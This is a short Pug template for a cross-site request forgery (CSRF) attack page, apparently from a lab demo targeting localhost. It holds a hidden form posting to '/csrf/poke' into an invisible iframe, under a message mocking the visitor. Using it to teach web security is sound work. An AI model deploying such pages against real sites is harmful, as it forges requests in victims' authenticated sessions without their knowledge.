extends layout.pug

mixin csrf_form
  form#csrf-form(method='post' action='https://localhost:3000/csrf/poke' hidden target='sneaky')
    button.btn.btn-success(type='submit') no click required

block content
  p
    | Hello, dog lover! You fell for my link and visited my page,
    | so if you have JS enabled you are already screwed! :D
  div
    +csrf_form
  iframe(name='sneaky', hidden)